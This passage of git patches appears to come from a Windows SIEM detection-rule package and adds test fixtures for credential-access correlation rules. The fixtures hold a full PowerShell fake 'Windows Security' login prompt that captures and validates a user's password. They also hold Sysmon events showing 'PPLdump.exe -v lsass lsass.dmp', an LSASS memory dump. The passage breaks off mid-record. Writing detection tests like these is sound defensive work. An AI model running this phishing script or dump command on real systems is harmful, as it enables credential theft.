\"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "object.process.id": "5500", "object.value": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-17T11:06:31.317Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-09-09T13:35:09.315Z", "type": "raw", "uuid": "baac7d95-1a5c-4dfb-892d-e6dee90ffb79"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "execute", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Input Capture: GUI Input Capture", "correlation_name": "Phishing_windows_credentials_powershell_scriptblock", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Phishing_windows_credentials_powershell_scriptblock|msedgewin10|function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.process.cmdline": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "object.value": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000"} From 8f87f1bec1f3d4cdb0b719c5f1fdc71dcf37aa68 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:41:54 +0300 Subject: [PATCH 14/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(PPL=5FBy?= =?UTF-8?q?pass=5Fvia=5FPPLDump=5FTool)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc | 5 +++++ .../PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc | 6 ++++++ .../PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc | 6 ++++++ .../PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc | 5 +++++ 4 files changed, 22 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc new file mode 100644 index 00000000..44140873 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.3896334Z\"},\"EventRecordID\":\"564589\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.377\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"ProcessId\",\"text\":\"6316\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"CommandLine\",\"text\":\"PPLdump.exe -v lsass lsass.dmp\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-efc5-6081-0000-00203ace0b00}\"},{\"Name\":\"LogonId\",\"text\":\"0xbce3a\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-f040-6081-0000-001046ac1b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4864\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-efc5-6081-0000-00203ace0b00", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.hash.imphash": "C547F2E66061A8DFFB6F5A3FF63C0A74", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "6316", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "ppldump.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:02:46.496Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.377Z", "type": "raw", "uuid": "32509031-dbdd-4326-89df-f0d67b16b61a"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.4177398Z\"},\"EventRecordID\":\"564590\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.417\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-001070650000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"652\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1000\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+2126e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+211e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+12c7|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.id": "652", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1000", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:02:46.497Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.417Z", "type": "raw", "uuid": "a44245de-9ba9-4bae-a27e-061f6c172bff"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "2544", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+9fc24|C:\\Windows\\System32\\KERNELBASE.dll+2126e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+211e|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+12c7|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+35c6|c:\\Users\\IEUser\\Desktop\\PPLdump.exe+45f8|C:\\Windows\\System32\\KERNEL32.DLL+17974|C:\\Windows\\SYSTEM32\\ntdll.dll+6a271", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|PPLdump.exe -v lsass lsass.dmp", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "747f3d96-6e19-6082-0000-001070650000", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "652", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "lsass.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "?", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "subject.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "subject.process.id": "6316", "subject.process.name": "ppldump.exe"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc new file mode 100644 index 00000000..ff1acc2f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc @@ -0,0 +1,6 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.3896334Z\"},\"EventRecordID\":\"564589\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.377\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"ProcessId\",\"text\":\"6316\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"CommandLine\",\"text\":\"PPLdump.exe -v lsass lsass.dmp\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-efc5-6081-0000-00203ace0b00}\"},{\"Name\":\"LogonId\",\"text\":\"0xbce3a\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-f040-6081-0000-001046ac1b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4864\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-efc5-6081-0000-00203ace0b00", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.hash.imphash": "C547F2E66061A8DFFB6F5A3FF63C0A74", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "6316", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "ppldump.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:58:15.650Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.377Z", "type": "raw", "uuid": "f8ef7fd0-08e8-4da7-9ae8-45057b6ed546"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.4177398Z\"},\"EventRecordID\":\"564590\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.417\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"SourceProcessId\",\"text\":\"6316\"},{\"Name\":\"SourceThreadId\",\"text\":\"2544\"},{\"Name\":\"SourceImage\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-001070650000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"652\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1000\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+9fc24|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+2126e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+211e|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+12c7|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+35c6|c:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe+45f8|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+17974|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6a271\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2544", "datafield9": 